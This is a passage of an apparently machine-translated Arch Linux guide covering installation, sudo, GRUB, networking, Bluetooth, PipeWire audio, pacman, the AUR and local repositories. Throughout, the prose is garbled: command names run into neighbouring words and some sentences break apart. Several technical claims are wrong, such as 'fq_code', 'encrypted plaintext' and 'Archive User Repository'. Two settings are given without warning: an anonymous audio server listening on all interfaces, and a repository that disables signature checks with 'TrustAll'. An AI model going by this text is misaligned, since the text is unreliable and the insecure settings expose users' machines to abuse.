This file contains hundreds of commented options (preceded by the symbol #). Search and uncomment (remove the #) the options you need. It is recommended to always have American English as a backup due to compatibility issues with certain compilers. For a user in Spain:

• en_US.UTF-8 UTF-8
• es_ES.UTF-8 UTF-8

(If you are from another Spanish-speaking country, please uncomment your corresponding version, e.g. esMX.UTF-8, esAR.UTF-8). (Make sure NOT to uncomment the ISO-8859 versions; those are outdated. Always use the ones ending in UTF-8).

Save the file ( Ctrl+O, Enter, Ctrl+X(in nano). Now, compile the localization binaries:

locale-gen

3.3.2 Environment Configuration Files

Once generated, you must tell the system which one to use by default for the entire system (environment variables). LANG).

Create the file locale.conf:

echo "LANG=es_ES.UTF-8" > /etc/locale.conf

Optionally, for users who demand precision, you can have a mixed system. For example, you could have the language in English (so that terminal error messages are searchable on Google), but use the Spanish date format, paper size (A4), and currency (€):

# En /etc/locale.conf
LANG=en_US.UTF-8
LC_TIME=es_ES.UTF-8
LC_MONETARY=es_ES.UTF-8
LC_PAPER=es_ES.UTF-8

3.3.3 Keyboard Layout in the Console (vconsole.conf)

The command loadkeys esThe keyboard layout we used in Chapter 2 is only temporary and stored in RAM. To ensure your keyboard remains in Spanish the next time you start your PC and see the TTY console (the black screen before the graphical environment), create the file vconsole.conf:

echo "KEYMAP=es" > /etc/vconsole.conf

(One la-latin1 rather es(if it's a Latin American keyboard).

3.4 Network Configuration: Hostname and Hosts ↑ Home

Your machine's identity on local networks is defined by its hostname(hostname). This is what you will see on your router, or in SSH terminals on other computers.

Create the file /etc/hostnameand type the name you want for your PC. It must be a single word, without spaces or special symbols. For example arch-workstation, srv-produccionsimply arch:

echo "arch-workstation" > /etc/hostname

3.4.1 Local DNS Resolution (/etc/hosts)

The file /etc/hostsIt's a primitive phone directory that the system consults before querying internet DNS servers. It's crucial for your machine to recognize itself on its own loopback network (127.0.0.0/8). Many local network applications (such as PostgreSQL databases or local web servers) will fail with severe timeouts if this file isn't correctly matched to your hostname.

Open the file:

nano /etc/hosts

Add the following structure, replacing arch-workstationby the name you chose in the previous step:

127.0.0.1        localhost
::1              localhost
127.0.1.1        arch-workstation.localdomain    arch-workstation

(Use: 127.0.0.1is the local IPv4 address and ::1(is the local IPv6 address).

3.5 Identity Management: Passwords, Users and Privileges (Sudo) ↑ Home

In the hierarchy of a UNIX system, rootHe is God. He has unrestricted permissions to overwrite RAM, hot-format disks, or erase the entire operating system without warning. He operates under the user's control. rootFor daily tasks, it is a massive security risk, not only against viruses (which would have no barriers), but also against human errors.

3.5.1 Superuser (Root) Password

We need to secure the main account.

passwd

system security reasons It will ask for your new password and to ask you to repeat it. For echoing , the terminal will not display asterisks or periods while you type; type with confidence.

3.5.2 Creating your Standard User

We will create the user that you will use 99% of the time.

useradd -m -G wheel -s /bin/bash francesc

Let's break down this crucial command:

• useraddThe system binary for creating identities.
• -m: (Make home). Automatically creates the personal home directory in /home/francesccopying the template from /etc/skel.
• -G wheel: (Group). Adds the user to the supplementary group wheelIn Red Hat and Arch-based distributions, wheelIt is the administrative group with the right to escalate privileges. (In Debian/Ubuntu, the group is used) sudo).
• -s /bin/bash: (Shell). Defines bash as the default console for the user.
• francesc: Your username (always in lowercase).

Of course, set a password for your new user:

passwd francesc

3.5.3 Privilege Escalation: Sudo Configuration

The user is in the administrators group, but the tool that allows "borrowing" root powers temporarily ( sudoIt is not pre-installed on Arch. This is a design decision, as some sysadmins prefer doas(from OpenBSD) or simply use su.

We will install sudo:

pacman -S sudo

The configuration of which users can use sudoresides in the file /etc/sudoersNever with edit this file directly nanothe vimIf you make a syntax error in sudoersThis will permanently block your own administrator access to the system in the future. To edit it, the secure binary is used. visudo, which checks the syntax when saving and prevents writing if it detects an error.

Default, visudoone viIf you prefer nano, overwrites the environmental variable:

EDITOR=nano visudo

Scroll down until you find the section that mentions the group. wheelYou will see a line like this:

# %wheel ALL=(ALL:ALL) ALL

Delete the pound sign ( #) to uncomment it . Save and exit. From this moment on, any user in the group wheel(like the one we just created) will be able to execute administrative commands by preceding them with the word sudoand typing their own user password (not the root password).

3.6 The Boot Manager (Bootloader): GRUB and systemd-boot ↑ Start

The final and most delicate step in Chroot is installing the bootloader. Without it, the motherboard won't know how to load the Linux kernel into RAM when you turn on the computer, leaving you with a black screen or a "No Bootable Device Found" error.

There are multiple managers for UEFI systems:

1. GRUB (GRand Unified Bootloader): The heavyweight. Extremely configurable, it supports booting ISO images directly, graphical themes, early LUKS disk decryption, and complex file systems like ZFS or Btrfs. It's the safest option due to its universality.
2. systemd-boot: A minimalist boot manager included directly in the systemd base system. It's ridiculously fast, configured with 3-line plain text files, and beautiful in its simplicity. However, it requires kernels to reside physically on the EFI FAT32 partition and is less flexible in complex dual-boot configurations.

Since we are building a comprehensive and bulletproof manual, we will use GRUB , as its maturity guarantees success in 99% of hardware scenarios.

3.6.1 Installing GRUB Packages

First, we installed the GRUB software and the tools to manipulate UEFI variables ( efibootmgr):

pacman -S grub efibootmgr

(Note for Dual-Boot: If you have Windows installed on another disk and want GRUB to show you a menu to choose between Arch and Windows, you must also install the package) os-proberand mount the Windows EFI partition, although this is detailed in advanced settings. For recent security reasons, os-prober is disabled by default in GRUB.

3.6.2 Deploying the UEFI Binary (grub-install)

The following command compiles a small file .efiand installs it on your partition /boot(which is the FAT32 partition we created in Chapter 2). It also uses efibootmgrto communicate directly with the NVRAM chip on your motherboard and insert a boot entry into the BIOS menu.

Execute carefully:

grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB

• --target=x86_64-efi: Forces compilation for modern 64-bit architectures.
• --efi-directory=/bootThe path where we mounted our FAT32 partition.
• --bootloader-id=GRUBThis is the name you'll see listed in your motherboard's F12 menu. You can put "ArchLinux" or whatever you like.

If the command executes successfully, it should return a message confirming that "No error was reported".

3.6.3 Generating the Configuration File (grub.cfg)

grub-installJust install the engine. Now we need to generate the map (the menu) that tells the engine where to find the kernel. vmlinuz-linux) and the initial file system in RAM ( initramfs-linux.imgGRUB has an auto-generating utility that scans your disks and creates this menu:

grub-mkconfig -o /boot/grub/grub.cfg

In the terminal output, you'll see how the script detects the Linux images and the Intel/AMD microcode you installed in pacstrap, and creates the appropriate menu entries.

3.6.4 (Optional) Micro-optimization of the Microcode in GRUB

And install intel-ucodethe amd-ucode, el script grub-mkconfigshould automatically inject them as a initrdPrimary. This means that before loading your operating system, the bootloader will inject microscopic security patches into your processor to protect you from hardware vulnerabilities. This underscores the power and importance of a well-configured bootloader.

3.7 Enabling the Network Manager and Closing ↑ Home

If we restart the PC right now, we would have a fully functional Arch Linux system. GRUB would boot, the kernel would load, and we would see a login screen asking for a username and password. However, we wouldn't have internet access . The daemon systemd-networkdThe Live ISO doesn't magically exist in our permanent installation unless we configure it. In Chapter 2 we installed networkmanagerIt's time to instruct the initialization system to boot it up on every startup.

systemctl enable NetworkManager

(Important note: Pay attention to capital letters in) NetworkManagerIt is one of the few services on Linux that uses them.

This ensures that, upon restarting, we will have a robust network service, capable of connecting via cable or managing complex WiFi networks in the future (which will be covered in Chapter 4).

3.7.1 The Elegant Exit

Your work as a systems surgeon in the chroot environment is finished. It's time to close the patient, clean the instruments, and wake the machine.

1. Chroot salt:

    exit

(Alternatively, Ctrl+DYou'll notice that the prompt reverts to that of the red ISO/zsh).

1. Remove partitions (Golden practice):

Although a reboot would force it, manually unmounting ensures that all RAM buffers are physically written to the SSD before power is cut.

    umount -R /mnt

( -RIt means recursive, disassembling first /mnt/boot and then /mntin the correct order).

1. Restart the machine:

    reboot

Disconnect your installation USB drive immediately! If you've followed the instructions precisely, your motherboard will process the firmware, call the GRUB UEFI file you just installed, and the glorious GRUB selection screen will appear for the first time, opening the doors to your new, pristine, and ultra-optimized Arch Linux system. In the following chapters, we'll move beyond the tyranny of installation to master system administration and the graphical environment.

Chapter 4: Advanced Networking and Audio Architecture ↑ Home

Welcome to your new Arch Linux installation. You have a working kernel and a privileged user, but your system is isolated from the world. In user-friendly operating systems, networking and audio "just work." In Arch, you have to build and understand these communication bridges. This chapter demystifies network routing and the complex evolution of audio in Linux.

4.1 Network Architecture in Linux and NetworkManager ↑ Home

Historically, the network in Linux was configured manually by editing /etc/network/interfacesand using monolithic commands like ifconfigToday, connectivity in desktop and laptop environments requires a dynamism that the classic method cannot offer (switching from a coffee shop Wi-Fi network to a corporate VPN, and then to an Ethernet cable in a matter of seconds). This is where NetworkManager comes in , a Red Hat-supported daemon that has become the industry standard.

4.1.1 The Command Line Tool: nmcli

Although NetworkManager has graphical interfaces, a systems administrator is mastered nmcliThis command allows you to do anything you would do in a visual interface, programmatically.

To see the overall status of all your interfaces:

nmcli device status

Managing Wi-Fi networks from the terminal: NetworkManager abstracts the use of wpa_supplicantthe iwdUnder the hood. To search for networks and connect:

1. Activate the scanner and display networks:

   nmcli device wifi list

1. Connecting to a new network (NetworkManager will save the profile and password in encrypted plaintext under /etc/NetworkManager/system-connections/):

   nmcli device wifi connect "SSID_DE_LA_RED" password "Tu_Contraseña"

Profile (Connection) Management: In NetworkManager, you don't interact directly with the "network card" to configure it; you interact with "Connections" (Profiles) that are applied to the devices. To view your saved profiles:

nmcli connection show

To force a static IP address (useful on servers) instead of DHCP:

nmcli connection modify "Nombre_Perfil" ipv4.addresses "192.168.1.50/24"
nmcli connection modify "Nombre_Perfil" ipv4.gateway "192.168.1.1"
nmcli connection modify "Nombre_Perfil" ipv4.method manual
nmcli connection up "Nombre_Perfil"

4.1.2 DNS Resolution and systemd-resolved

When you write google.comYour system must translate that name to an IP address. By default, NetworkManager uses the DNS servers provided by your router. However, in advanced environments, you'll want to use systemd-resolved to implement DNS over TLS (DoT) or local DNS caching, preventing your internet service provider (ISP) from tracking your queries.

To activate the local systemd resolver:

sudo systemctl enable --now systemd-resolved.service

Next, we need to link the classic Unix file /etc/resolv.confso that it points to the systemd daemon:

sudo ln -sf /run/systemd/resolve/stub-resolv.conf /etc/resolv.conf

From this point forward, you can audit your DNS requests using:

resolvectl status

To force the use of Cloudflare's DNS (1.1.1.1) with encryption, you can edit /etc/systemd/resolved.confand add:

[Resolve]
DNS=1.1.1.1 1.0.0.1
DNSOverTLS=yes

Restart the service ( systemctl restart systemd-resolved) and your browsing will be protected from DNS-level sniffing.

4.2 The Bluetooth Stack (BlueZ) ↑ Home

The Bluetooth ecosystem in Linux is based on a colossal project called BlueZ , sponsored by companies like Intel. BlueZ provides the kernel-level protocol stack and user tools for communicating with wireless devices (Low Energy, A2DP audio, HID peripherals).

4.2.1 Installation and Daemons

sudo pacman -S bluez bluez-utils

The main package contains the daemon bluetoothdYou must enable it in the startup system:

sudo systemctl enable --now bluetooth.service

4.2.2 Interaction with bluetoothctl

Just like nmcliBlueZ provides an interactive client for pairing devices from the console, essential before installing a graphical environment (or for "headless" servers).

Run the client:

bluetoothctl

You will enter the interactive prompt. The professional workflow for connecting headphones or a keyboard is:

1. Turn on the local adapter: [bluetooth]# power on
2. Activate temporary scanning: [bluetooth]# scan on

(You'll see a flurry of MAC addresses and names. When you see your device, copy its MAC address, e.g. 00:1D:43:XX:YY:ZZ) .

1. Emparejar (Pairing): [bluetooth]# pair 00:1D:43:XX:YY:ZZ

(This swaps the cryptographic pairing keys.)

1. Trusting: [bluetooth]# trust 00:1D:43:XX:YY:ZZ

(Crucial: This allows the device to automatically reconnect in the future without asking for permission.)

1. Conectar (Connecting): [bluetooth]# connect 00:1D:43:XX:YY:ZZ

If at any point the Bluetooth audio mysteriously fails or becomes choppy, administrators use the built-in Bluetooth monitor to inspect the raw HCI (Host Controller Interface) packets:

sudo btmon

4.3 Audio Architecture: The PipeWire Revolution ↑ Home

For the past decade, audio on Linux has been a source of memes and frustrations. There were three parallel subsystems that often clashed with each other:

1. ALSA (Advanced Linux Sound Architecture): The lowest level, integrated into the kernel. It handles electrical communication with your sound card. (Problem: Only one application could use ALSA at a time.)
2. PulseAudio: A sound server built on top of ALSA. It mixed audio streams so you could listen to YouTube and Spotify simultaneously. (Problem: It added unacceptable latency for professional music production.)
3. JACK: Designed for strict low latency in music production and advanced routing. (Problem: Unusable for the average desktop user; it blocked web browsers.)

The Solution: PipeWire. Initially developed by Wim Taymans at Red Hat, PipeWire is a next-generation media server. It not only replaces PulseAudio and JACK, combining the ease of use of the former with the low latency of the latter, but also routes video streams (essential for screen capture in modern Wayland-based environments).

4.3.1 Installation of PipeWire and its Wrappers

In Arch Linux, we want to install the main server and the compatibility layers (wrappers) that trick older programs into thinking they are talking to PulseAudio or JACK.

sudo pacman -S pipewire pipewire-alsa pipewire-pulse pipewire-jack

(If the system asks you if you want to delete pulseaudioDue to conflicts, you must answer yes. This is intentional.

4.3.2 WirePlumber: The Audio Brain

PipeWire is simply the "pipes" through which multimedia information travels. For the pipes to know where to go (e.g., "If I connect Bluetooth headphones, it automatically routes the audio to them"), we need a Session Manager . The de facto standard, supported by Collabora, is wireplumber.

sudo pacman -S wireplumber

4.3.3 Activation and the User Space (systemd --user)

Unlike the network or Bluetooth, which are system daemons run by the almighty rootIn modern Linux, audio and video are handled in user space. This is a vital security measure: you don't want a global system daemon accessing the microphone and sending audio without the active user's knowledge.

Therefore, PipeWire services are activated using the flag --userfrom systemd. ATTENTION: Do not use sudoTo run the following commands , you must run them as your standard user:

systemctl --user enable --now pipewire.service
systemctl --user enable --now pipewire-pulse.service
systemctl --user enable --now wireplumber.service

To verify that the architecture is in place and that the wrappers are working correctly, run an info command from the legacy PulseAudio server. If PipeWire intercepts the call, you'll see its name:

pactl info

Look for the line "Server Name". It should say PulseAudio (on PipeWire). Magic!

4.3.4 Control and Diagnosis with wpctl

wireplumberIt includes a powerful command-line tool for manipulating audio nodes, volume, and default devices: wpctl (WirePlumber Control).

To list all "sinks" (speakers/outputs) and "sources" (microphones/inputs) detected by the system:

wpctl status

The output will display numeric identifiers. The device will have an asterisk. *Next to it is the current default device (Default Node).

To modify the volume from a bash script or a keyboard shortcut in a window manager, you can use relative syntax. To increase the volume of the default device by 5%:

wpctl set-volume @DEFAULT_AUDIO_SINK@ 5%+

Lower the volume by 5%:

wpctl set-volume @DEFAULT_AUDIO_SINK@ 5%-

Mute the microphone by default (useful for a dedicated mute key on your keyboard):

wpctl set-mute @DEFAULT_AUDIO_SOURCE@ toggle

With a solid network foundation, encrypted DNS profiles, Bluetooth connectivity for peripherals, and the most advanced multimedia stack on the market, your core system is operationally complete. You've transformed an inert console into a fully functional workstation. The next big step in our architectural journey (Chapter 5) is mastering the software lifecycle: the sacred art of package management.

4.4 Advanced Networks: VLANs, Bonding and QoS ↑ Home

Once you master basic connectivity with NetworkManager, the next architectural level, especially critical on servers or workstations in corporate environments, is the manipulation of logical network layers.

4.4.1 VLANs (802.1Q)

Virtual Local Area Networks (VLANs) allow you to divide a physical switch (or your network card) into multiple logical subnets that cannot see each other (e.g., one network for security cameras, another for guests, and another for administration). In Arch Linux, NetworkManager handles this flawlessly.

If your office network sends traffic tagged with VLAN 10 to your Ethernet port (e.g. enp3s0), you can capture and virtualize that interface on your PC:

# Crear la interfaz virtual etiquetada como VLAN 10
nmcli connection add type vlan con-name VLAN10 dev enp3s0 id 10
# Asignarle una IP estática en el segmento correcto
nmcli connection modify VLAN10 ipv4.addresses 10.0.10.5/24 ipv4.method manual
nmcli connection up VLAN10

You will now have a virtual interface enp3s0.10 in ip linkwhich functions as if it were a separate physical cable.

4.4.2 Link Aggregation (Bonding)

What do you do if you have two Gigabit Ethernet network cards on your motherboard and your file server is struggling to transfer at 1 Gbps? You bond them together. Network bonding (or teaming) allows you to combine bandwidth or provide fault tolerance (if you disconnect one cable, the other remains active without interrupting the stream).

Mode 4 (LACP - Link Aggregation Control Protocol) is the most professional, assuming your network switch supports it:

# Crear la interfaz maestra de tipo bond
nmcli connection add type bond con-name MiBond ifname bond0 bond.options "mode=802.3ad,miimon=100"
# Añadir los dos cables físicos como esclavos del bond
nmcli connection add type ethernet slave-type bond con-name MiBond-Esclavo1 ifname enp3s0 master bond0
nmcli connection add type ethernet slave-type bond con-name MiBond-Esclavo2 ifname enp4s0 master bond0

4.4.3 Bufferbloat Mitigation (QoS with fq_code)

"Bufferbloat" occurs when you download a massive file (using 100% of your bandwidth) and your video game's ping spikes from 20ms to 300ms because the game's small packets get stuck behind the download in the modem's buffer. The Linux kernel introduced a mathematical marvel called fq_code (Fair Queuing Controlled Delay) that reorders packets in real time, prioritizing small, fast-moving streams over large downloads.

To activate it, we instruct the kernel to use the default algorithm (sysctl):

sudo nano /etc/sysctl.d/99-network.conf

We added:

net.core.default_qdisc=fq_codel

After restarting (or applying with sudo sysctl --system), you can saturate your network connection with torrents and your ping in League of Legends or Zoom calls will remain identical as if you weren't downloading anything.

4.5 Professional Audio: Mastering PipeWire ↑ Home

PipeWire doesn't just play YouTube audio; it's a Swiss Army knife that blurs the line between end-user audio and professional recording studio routing.

4.5.1 Latency, RTirq and Crackling Mitigation

If you use MIDI synthesizers or DJ software (like Mixxx) and hear crackling/Xruns when playing the piano, it's because PipeWire's buffer size is too small and your CPU doesn't have time to process the sound.

Adjusting the Quantum (Buffer): We can force the runtime latency. The "Quantum" is the number of samples per block. 1024 is safe but has lag; 128 has very low latency but is CPU-intensive. To force an ultra-fast buffer on a sound card running at 48000 Hz:

PIPEWIRE_LATENCY="128/48000" mixxx

To avoid crackling at such low latencies, the PipeWire daemon needs system permission to interrupt all other programs (RealTime Priority). Install rtirq:

sudo pacman -S rtirq
sudo systemctl enable --now rtirq.service

This reorganizes the motherboard's IRQ interrupts, giving your USB/PCIe sound card top hardware priority over your graphics card or hard drives.

4.5.2 Systemic Parametric Equalization (EasyEffects)

Instead of relying on individual program equalizers (Spotify, Firefox), in Arch you can install an interceptor layer that mathematically processes all the operating system's sound using convolution.

sudo pacman -S easyeffects lsp-plugins

EasyEffects uses PipeWire's graph structure to act as a proxy for all audio outputs. You can apply:

• Auto-Gain: Normalizes the volume of YouTube videos, so you'll never be startled by an ad 3 times louder than the video.
• Convolver: You can download impulse response (IR) files from $10,000 acoustic studios, upload them here, and make your $30 headphones sound acoustically like a professional studio sound corrected by sonar (AutoEQ technology).
• Noise Reduction (RNNoise): An AI filter for your microphone. It intercepts noise from mechanical keys or PC fans, sending a clean announcer voice to Discord/Teams.

4.5.3 Network Audio

Do you have amazing speakers connected to your desktop PC, but you're cooking on the other side of the house with your laptop and want Spotify playing on your desktop? PipeWire includes TCP protocol modules for network routing. No cables required.

On the Server PC (Desktop), you activate the native module:

pactl load-module module-native-protocol-tcp listen=0.0.0.0 auth-anonymous=1

On your laptop (client), you instruct it not to play locally, but to send the raw IP signal to the server:

PULSE_SERVER=tcp:192.168.1.50 spotify

The audio will be transmitted bit-perfectly and uncompressed over your home Wi-Fi. With this level of modularity, Arch Linux gives you the control of a commercial broadcast network right at your fingertips.

Chapter 5: Package Management, Pacman, and the AUR Revolution ↑ Home

If the kernel is the heart of Arch Linux, the package manager is its circulatory system. Unlike Windows, where you browse the web to download installers .exeOf dubious origins, in Linux you rely on centralized, cryptographically signed repositories. Arch Linux shines exceptionally in this regard thanks to two legendary components: Pacman (the official manager) and the AUR (Arch User Repository, the world's largest community-driven software library).

In this chapter, we will learn to master these tools not as simple users who copy and paste commands, but as system administrators who understand how software is packaged, compiled, and deployed.

5.1 Pacman Anatomy and Architecture ↑ Home

pacmanIt's a manager written in C. Unlike the old apt(Ubuntu/Debian) which abstracts to dpkgpacman handles both dependency resolution from remote servers and the installation of local files.

5.1.1 The Package Format (.pkg.tar.zst)

In Arch Linux, a compiled (binary) software package isn't black magic. It's simply a compressed file using the highly advanced zstd algorithm (Zstandard, created by Facebook for maximum decompression speed). If you download a package like firefox-125.0-1-x86_64.pkg.tar.zstand unzip it (using tar -I zstd -xf), you'll see that inside it only contains two things:

1. The actual directory structure: (e.g., a folder) usr/bin/firefox).
2. Metadata files (MTREE): Hidden text files ( .PKGINFO, .INSTALL) that pacman reads to find out what version it is, who built it, and what scripts to run when installing or uninstalling it.

When pacman "installs" a package, it literally extracts this folder structure onto the root of your hard drive and records it in its database ( /var/lib/pacman/local/) which files belong to which program.

5.1.2 Optimizing pacman.conf

Pacman's behavior is strictly dictated by the file /etc/pacman.confLet's configure it like a professional. Open the file:

sudo nano /etc/pacman.conf

Find and modify the following options in the section [options]:

• Parallel Downloads: Uncomment the line ParallelDownloads = 5By default, pacman downloads packages one at a time. Enabling this will download 5 files simultaneously, multiplying the update speed by 5 on fiber optic connections.
• Visual color: Disclaimer ColorThe terminal output will be infinitely more readable.
• Easter Egg (Pac-Man): Just below Color, write a new line with the word ILoveCandyThis will transform Pac-Man's progress bar (which are normally dashes). #) in a Pac-Man that eats pills ( c-o-o-o).

5.1.3 The Multilib Repository

Arch Linux today is a strictly 64-bit distribution ( x86_64There are no longer any base repositories for older 32-bit processors. However, much proprietary software, such as Steam, Wine, and emulated Windows games, is still programmed in 32-bit. To run this software, you must enable the repository. [multilib], which contains libraries (such as lib32-glibc) that allow a 64-bit system to natively execute 32-bit binaries. In the same pacman.confScroll down to the bottom and uncomment these two lines:

[multilib]
Include = /etc/pacman.d/mirrorlist

Save the file and update the repository database for the changes to take effect:

sudo pacman -Sy

(Note: Only -SyIt updates the database of which packages exist on the servers (it does not update your local software).

5.2 Mastering Pacman Commands (S, Q, R) ↑ Home

Pacman uses main flags in uppercase to define the operation, and subflags in lowercase to refine it.

1. Synchronization Operations (-S):

• sudo pacman -Syu: The Holy Grail of Arch. S (Sync), y (Refresh repositories), u(sysUpgrade). This command synchronizes local databases with the servers and immediately updates all installed packages to their latest version. Run this at least weekly. Never use -Syfollowed by a loose installation without doing -SyuYou could cause a partial update state that will break your system.
• sudo pacman -S paqueteInstall a new program from the official repositories.
• pacman -Ss palabra: Searches for packages in remote repositories that match the keyword.

2. Local Query Operations (-Q):

• pacman -Q: List all packages installed on your system and their version.
• pacman -Qe: Lists only the packages explicitly installed by you (ignoring dependencies that were installed automatically). Useful for backing up your installation.
• pacman -Qo /ruta/al/archivoDo you see a strange file on your system and don't know which program it came from? This command queries the pacman database to tell you who the file belongs to.

3. Elimination Operations (-R):

• sudo pacman -R paquete(Danger!) Removes the package, but leaves installed all the dependencies it brought with it, accumulating junk on your hard drive (orphans).
• sudo pacman -Rs paquete: (The correct way) . Removes the package and recursively removes any of its dependencies that are not being used by any other program on your system.
• sudo pacman -Rns paqueteIt does the same as -Rs, but also ( n(from No-save) deletes global configuration files ( .pacsave) that the program could leave in /etc/.

5.3 The AUR (Archive User Repository) and the Compilation Process (Makepkg) ↑ Home

If a piece of software is legally proprietary (e.g., Google Chrome), niche (e.g., a dark theme for a window manager), or very new, it won't be in the official Arch repositories. However, it's 99.9% guaranteed to be in the AUR .

The AUR does not contain software . There are no precompiled binaries. The AUR is a giant collection of recipes, called PKGBUILDs , written by users like you. A PKGBUILD is a Bash script that contains the exact instructions: where to download the source code, how to patch it, how to compile it, and how to package it into a... .pkg.tar.zstso that Pacman can install it.

5.3.1 Manual Compilation: The Arch Way

Every Arch user should manually install an AUR package at least once in their lifetime to understand the mechanics and security risks (if someone puts a malicious command in the PKGBUILD, it will run on your machine).

To compile, you need the development toolset (C/C++ compilers, Make, automake, patch) and Git:

sudo pacman -S base-devel git

Manual example: Installing the browser google-chrome(which is closed and unofficial).

1. Cloning the AUR repository:

You must do it as your normal user, NEVER as root .

    git clone https://aur.archlinux.org/google-chrome.git
    cd google-chrome

1. Inspection (Mandatory in safety):

Open the file PKGBUILD with nanothe cat. Read the URLs you download ( source=()Make sure they are pointing to dl.google.comand not to some strange Russian server.

1. Construction and Installation (makepkg):

We run the Arch builder tool.

    makepkg -si

• -s(Sync dependencies): If the PKGBUILD requires other things to compile, it will call pacman to install them first.
• -i(Installation): After spending minutes or hours compiling and generating the .pkg.tar.zst, will automatically run pacman to install the final result.

5.4 AUR Automation: The "AUR Helpers" (Yay / Paru) ↑ Home

Perform the previous manual process of cloning, reading the PKGBUILD, and executing makepkgEvery time you want to update an AUR package or search for a new one, it's a nightmare. To solve this, the community created AUR Helpers . These programs wrap pacman, adding the ability to automatically search, clone, and update from the AUR.

The two dominant players in the market are Yay (Yet Another Yogurt, written in Go) and Paru (written in Rust, developed by the original creator of Yay). Install whichever you prefer; their commands are identical. We will install yay.

Given that yayIt is an AUR tool; paradoxically, the only way to install it for the first time is by using the manual method.

cd ~
git clone https://aur.archlinux.org/yay.git
cd yay
makepkg -si

5.4.1 Mastering Yay

From now on, yayIt's your best friend. In fact, you can stop using it. pacmanalmost completely, since yayIt passes all commands from the official repositories directly to pacman and manages the AUR in the background. Don't use sudoWith yay, it will ask you for the password to install the package when it finishes compiling it.

• Search and install from both worlds (Official + AUR):

    yay -S spotify

(Yay will download the PKGBUILD, read it, resolve the dependencies, and install it for you.)

• Update the entire system:

The master Arch maintenance command is now:

    yay -Syu

Or, in an even more minimalist way, simply write yayPressing Enter will perform a full update. Yay will first update the official Arch packages, and then check for updates for programs compiled in the AUR.

5.4.2 Cleaning and Maintenance of the Cache (Paccache)

Arch Linux never deletes a downloaded package from the cache. Every time you update the kernel, the old file .pkg.tar.zstit stays in /var/cache/pacman/pkg/Over the years, this can take up tens of gigabytes on your SSD, stealing precious space. This cache is useful for downgrading if an update fails, but you don't need to keep the previous 40 versions of Firefox.

Install the contributed utilities package:

sudo pacman -S pacman-contrib

The tool paccacheIt will clean up all old packages, keeping only the 3 most recent versions of each installed program by default, giving you a safety net without wasting unnecessary space:

sudo paccache -r

To automate it and forget about it, enable the systemd timer (the modern cron, which we will see in detail in Chapter 10) that comes included:

sudo systemctl enable --now paccache.timer

You've mastered the package system. You understand how pacman manages the binary, and how the AUR expands the software virtually indefinitely through compilation. With these tools, your TTY is ready to evolve; in the next chapter, we'll move on to the visual layer: Desktop Environments and the Graphical Server.

5.5 Local Repositories: Host Your Own AUR ↑ Home

The vast majority of users consume the AUR, but few understand that pacmanIt's designed to be completely decentralized. You don't have to rely on third-party repositories to install packages; if you need to distribute an internal program in your company or server cluster (Home Lab), you must create your own repository.

5.5.1 Forging the Database with repo-add

Imagine you have compiled the custom kernel linux-tkgor proprietary management software, generating the file mi-software-1.0-1-x86_64.pkg.tar.zstFor pacman to accept it over the network, it must be indexed.

1. Create a directory that will act as your server:

    mkdir -p /var/www/html/mi_repo
    # Copia el paquete binario a la carpeta
    cp mi-software-1.0-1-x86_64.pkg.tar.zst /var/www/html/mi_repo/

1. Generate the Pacman database. The command repo-addcreate a file .db.tar.gzthat Pacman reads to understand dependencies:

    cd /var/www/html/mi_repo
    repo-add mi_repo.db.tar.gz mi-software-1.0-1-x86_64.pkg.tar.zst

1. Deploy your repository. You can use Nginx (Chapter 14) or, for a fast LAN, Python's built-in HTTP module:

    python -m http.server 8080

5.5.2 Modifying Customers

Now, on your laptop (or any machine that needs to install the corporate software), you edit /etc/pacman.confand add to the end of the file:

[mi_repo]
SigLevel = Optional TrustAll
Server = http://192.168.1.150:8080

You execute sudo pacman -Syand you'll see that it downloads your database and now you can install mi-softwarewith a simple pacman -S mi-softwareThis is the secret of Manjaro, EndeavourOS, and BlackArch: they are simply Arch Linux with extra repositories added to the system. pacman.conf.

5.6 Surgical Packaging (Chroot with devtools) ↑ Home

When you write a PKGBUILDand you execute makepkgOn your development machine, there's a catastrophic risk, colloquially known as "It works on my machine." If your PKGBUILD compiles correctly, it might be because three months ago you installed a C++ library called boostfor another project. Since it's installed on your system, today's build finds it and succeeds. But you forgot to note boostin the dependencies (depends=) of the PKGBUILD. When you upload your package to the AUR, thousands of users will try to compile it and fail with a "library not found" error because they don't have boostinstalled.

The official Arch team uses devtools to solve this, ensuring the purity of the environment.

5.6.1 Construction in Isolation (extra-x86_64-build)

Instead of compiling in your polluted environment, devtoolsIt automatically creates a clean "chroot" with the most basic Arch Linux base (no libraries, no configurations, no themes), puts the PKGBUILD inside, and compiles it. If your script is missing a dependency, it will fail spectacularly, allowing you to catch the error.

1. Instala el kit para mantenedores de paquetes:

    sudo pacman -S devtools

1. Go to your PKGBUILD folder, but DO NOT run makepkgInstead, launch the container builder:

    extra-x86_64-build

This tool will set up a pristine chroot environment in /var/lib/archbuild/pacman will synchronize, resolve the declared dependencies, and attempt to build. The resulting package is mathematically predictable and pure, guaranteed to work on any other user's machine.

5.6.2 Cryptographic Firms (GPG) in Pacman

To prevent Man-In-The-Middle (MITM) attacks, where a malicious ISP injects malware into packages you download from an HTTP mirror, pacman verifies that each package is cryptographically signed by an Arch Linux "Master Keyholder".

The keyring updates automatically, but if a developer renews their key, your pacman will fail to update with a PGP signature error. This is alarmingly common. The emergency protocol to reset the keyring and purge expired keys (resurrecting a broken pacman) is:

sudo rm -rf /etc/pacman.d/gnupg/
sudo pacman-key --init
sudo pacman-key --populate archlinux
sudo pacman -Sy archlinux-keyring

With this level of depth, your relationship with software in Arch Linux has evolved: you are no longer just a consumer of binaries, you have become an orchestrator capable of building, verifying, signing and distributing software at network scale.

Chapter 6: Desktop Environments and the Graphical Server ↑ Home

In commercial operating systems like Windows or macOS, the graphical interface is hardwired to the operating system kernel. If the window manager crashes, the entire operating system often freezes (the infamous Blue Screen of Death). In Linux, the design philosophy is radically modular. The graphical user interface (GUI) is simply another application (or set of applications) running in user space. You can stop it, replace it with a completely different one, or not use it at all, and your server will continue to function without interruption.

In this chapter, we will build the Graphics Stack from the foundation (the drivers) to the roof (the interactive desktop environment).

6.1 The Base Layer: Graphics Drivers and Mesa ↑ Home

Before we can draw pixels on the screen, the operating system needs to know how to communicate with the graphics processing unit (GPU). Graphics cards are complex mathematical calculators that don't understand standard system commands.

